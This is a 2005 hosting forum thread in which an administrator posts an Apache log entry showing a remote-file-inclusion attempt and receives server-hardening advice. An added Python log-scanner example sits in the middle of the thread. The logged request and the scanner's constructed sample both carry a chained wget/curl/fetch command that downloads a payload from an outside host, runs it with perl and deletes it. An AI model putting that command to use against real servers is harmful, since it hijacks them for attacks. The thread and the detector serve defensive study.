The Community Forums


I did grep "wget" and got this

Discussion in 'General Discussion' started by Tina, Nov 5, 2005.

  1. Tina

    Tina Well-Known Member

    Joined:
    Jan 27, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Hi,

    I did grep "wget" /usr/local/apache/domlogs/*

    And I got bunches of these as shown below. Don't know what to make of it. It happened to/from 16 different domains on my server, 2 times each. BTW I don't know whose IPs these are.


    Code:
    /usr/local/apache/domlogs/mydomain.com:211.38.128.10 - - [01/Nov/2005:13:51:24 -0600] "GET  
    /webcalendar/tools/send_reminders.php?includedir=http://82.165.228.69/images/fbi.gif?
    &cmd=cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
    perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1" 404 - "-"
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    In the meantime I did chmod 700 wget as suggested by chirpy and I updated php (Jackie) and installed apf and did everything else I could find in these forums...

    The reason: outbound UDP DoS attacks from my server. I still don't know where the vulnerability is or if I have done enough to secure my server...

    It's been a long two days for this newbie :(

    TIA,

    Tina
     
    #1 Tina, Nov 5, 2005
    Last edited: Nov 5, 2005
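A more precise version of the grep in the post above, as an added example that is not from the thread: it parses the domlog lines grep prints (file prefix included), URL-decodes each request and flags only those whose query string carries a remote URL or a chained download command, so a harmless page that merely contains the word "wget" is not reported. The sample lines are constructed, modelled on the request quoted above with documentation IP ranges and a placeholder filename substituted.

```python
import re
from urllib.parse import unquote

# Combined-log line, optionally prefixed with "logfile:" as grep prints it when run over
# several files (as the thread's grep over /usr/local/apache/domlogs/* does).
LOG_RE = re.compile(
    r'^(?:(?P<logfile>[^:\s]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Download tools an injected command chains together ("fetch" is the BSD one in the thread's hit).
FETCH_TOOLS = re.compile(r'(?:^|[\s;|&`$(])(wget|curl|fetch|lynx|lwp-download)\b')

# Constructed sample: line 1 is modelled on the hit quoted in the thread (curl/fetch steps dropped,
# hosts replaced by documentation addresses); line 2 is a harmless request that grep "wget" also matches.
SAMPLE = (
    '/usr/local/apache/domlogs/mydomain.com:198.51.100.23 - - [01/Nov/2005:13:51:24 -0600] '
    '"GET /webcalendar/tools/send_reminders.php?includedir=http://203.0.113.7/images/x.gif?'
    '&cmd=cd%20/tmp;wget%20http://203.0.113.9/images/sess_deadbeef;perl%20sess_deadbeef;'
    'rm%20-rf%20sess* HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"\n'
    '/usr/local/apache/domlogs/mydomain.com:198.51.100.40 - - [01/Nov/2005:14:02:01 -0600] '
    '"GET /docs/wget-manual.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"\n'
)

def analyse_target(target):
    """URL-decode a request target; return (path, reasons it looks like RFI / command injection)."""
    path, _, query = unquote(target).partition('?')
    reasons = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if value.lower().startswith(REMOTE_SCHEMES):
            reasons.append(f"remote URL passed in '{name}'")
        if ';' in value and FETCH_TOOLS.search(value):
            reasons.append(f"chained shell command using a download tool in '{name}'")
    return path, reasons

def scan_domlogs(text):
    """Parse grep output or raw domlogs and keep only the requests that look hostile."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, reasons = analyse_target(m['target'])
        if reasons:
            hits.append({'logfile': m['logfile'], 'ip': m['ip'], 'time': m['time'],
                         'path': path, 'status': int(m['status']), 'reasons': reasons})
    return hits
```

`scan_domlogs(SAMPLE)` returns only the first line, with both the `includedir` and `cmd` parameters flagged; the recorded status matters too, since a 404 (as in the thread's hits) means that vhost had no such script and the request was a probe rather than a successful include.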
  2. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Try setting up mod_security (there are plenty of threads on how to do it around here).
     
  3. Tina

    Tina Well-Known Member

    Joined:
    Jan 27, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    It's done. Thank you. Anything else I can do?
     
  4. astopy

    astopy Well-Known Member

    Joined:
    Apr 3, 2003
    Messages:
    165
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    There are quite a few good threads around here with instructions for securing your server; if you follow their recommendations you should be ok.
     
  5. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
  6. Tina

    Tina Well-Known Member

    Joined:
    Jan 27, 2003
    Messages:
    63
    Likes Received:
    0
    Trophy Points:
    6
    Yes. I went through all the guides, implemented almost all the suggestions. How do I know that I am ok now? How do I know if I fixed what was broken when I don't know what was broken? It's all a mystery really. Here's what I did.

    installed or upgraded or compiled:

    mod_security
    php 4.4.1
    chkrootkit (cron job 3 times a day - a bit much I see but I am learning)
    rkhunter
    ssh login to different port, ip and protocol 2
    ssh root login disabled
    apf with antidos
    bfd
    log watch (10)
    mail :fail:
    chmod 700 wget
    telnet disabled
    mysql password changed different from root
    some whm config changes

    What I don't understand yet is whether or not I should do anything with the /tmp directory and phpsuexec.

    And I need to upgrade my os.

    So am I ok? Is this enough? I have 2 more boxes to work on after I finish this one. :rolleyes:

    T.
     
  7. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Really, you should do something with your /tmp as well, yes. There is a tutorial on that site for mounting /tmp with permissions to help prevent files from being run inside the /tmp directory. It's not 100% effective anymore, but will stop most of the 'scripts' from getting going.
    Also note that wget is just one method used to download files to the server.
    http://www.eth0.us/node/6
    http://www.eth0.us/obscurity
    http://www.eth0.us/php

    Also, while it's a bit on the technical side, you might want to also check your kernel version, and if it's outdated, look into compiling an updated and more secure version.

    In your APF, you have egress filtering enabled, yes?
     